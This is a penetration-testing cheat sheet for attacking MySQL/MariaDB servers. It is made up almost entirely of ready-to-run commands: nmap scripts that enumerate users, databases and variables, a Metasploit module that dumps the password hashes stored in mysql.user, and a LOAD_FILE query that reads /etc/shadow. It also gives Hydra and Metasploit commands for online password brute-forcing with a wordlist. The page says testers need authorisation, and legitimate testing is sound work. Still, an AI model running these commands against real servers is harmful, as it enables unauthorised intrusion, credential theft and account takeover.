SQL
Structured Query Language (SQL) is a standardized language for managing relational databases and querying the data in them. This page covers enumerating and attacking a MySQL/MariaDB server (TCP 3306); every command assumes `$IP` is set to the target and that you are authorised to test it.
Enumeration
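# Credentials used by the credential-dependent scripts below. They default to
# root with an empty password — the case mysql-empty-password reports — so
# change them once you find working credentials.
MYSQL_USER='root'
MYSQL_PASS=''

# Default scan: confirm the service and banner version on 3306
nmap $IP -sV -p 3306
# Empty password script: checks whether root/anonymous accounts accept an empty password
nmap $IP -sV -p 3306 --script=mysql-empty-password
# Get Mysql info (version, protocol, capabilities; no credentials needed)
nmap $IP -sV -p 3306 --script=mysql-info
# Get mysql users (requires valid credentials)
nmap $IP -sV -p 3306 --script=mysql-users --script-args="mysqluser='$MYSQL_USER',mysqlpass='$MYSQL_PASS'"
# Get mysql databases (requires valid credentials)
nmap $IP -sV -p 3306 --script=mysql-databases --script-args="mysqluser='$MYSQL_USER',mysqlpass='$MYSQL_PASS'"
# Get mysql variables (requires valid credentials; note secure_file_priv — it
# decides whether LOAD_FILE / INTO OUTFILE will work later)
nmap $IP -sV -p 3306 --script=mysql-variables --script-args="mysqluser='$MYSQL_USER',mysqlpass='$MYSQL_PASS'"
# mysql audit: runs the bundled CIS benchmark checks. This script takes its own
# mysql-audit.* argument names (not mysqluser/mysqlpass). The audit file path is
# the Kali/Debian default; adjust it for other nmap installs.
nmap $IP -sV -p 3306 --script=mysql-audit --script-args="mysql-audit.username='$MYSQL_USER',mysql-audit.password='$MYSQL_PASS',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"
# Try to connect directly without a password (add -p to be prompted once a password is known)
mysql -h $IP -u "$MYSQL_USER"
# Run query: books.authors is an example table from one particular target —
# replace it with a database/table seen in the mysql-databases output
nmap $IP -sV -p 3306 --script=mysql-query --script-args="query='select count(*) from books.authors;',mysqluser='$MYSQL_USER',mysqlpass='$MYSQL_PASS'"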
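# Metasploit way. The original snippet set options and ran without ever
# selecting a module, so `run` had nothing to execute. DIR_LIST with
# directory.txt is the option/default of
# auxiliary/scanner/mysql/mysql_writable_dirs, which tries to write a test
# file into each listed directory — confirm with `info` that this is the
# intended module. Like the other scanner modules on this page it needs
# credentials.
msfconsole
use auxiliary/scanner/mysql/mysql_writable_dirs
setg rhosts $IP
set username root
set password ""
set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt
set verbose false
run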
## Hashdump: dump password hashes from the mysql.user table
## (needs credentials allowed to read it; crack the hashes offline)
msfconsole
use auxiliary/scanner/mysql/mysql_hashdump
setg RHOSTS $IP
set USERNAME root
set PASSWORD ""
run
Read local files via the database (FILE privilege)
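# connect to instance
mysql -h $IP -u root
# LOAD_FILE() needs the FILE privilege and is governed by secure_file_priv:
# NULL disables file access, a directory restricts reads to that path, and an
# empty value means unrestricted. Check both first so a NULL result is not
# misread as "file does not exist".
SHOW GRANTS FOR CURRENT_USER();
SHOW VARIABLES LIKE 'secure_file_priv';
# read local file. The file must also be readable by the OS account mysqld runs
# as (normally 'mysql', which cannot read /etc/shadow), so confirm the primitive
# on a world-readable file such as /etc/passwd before trying sensitive paths.
# Writing files (SELECT ... INTO OUTFILE) is subject to the same restrictions.
select load_file("/etc/shadow");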
Bruteforce
# Metasploit way: online password guessing against a single account.
# Noisy — every attempt is logged by the server; stop at the first hit.
msfconsole
use auxiliary/scanner/mysql/mysql_login
setg RHOSTS $IP
set USERNAME root
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set STOP_ON_SUCCESS true
set VERBOSE false
run
# Hydra: same wordlist attack using the service://target form
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt mysql://$IP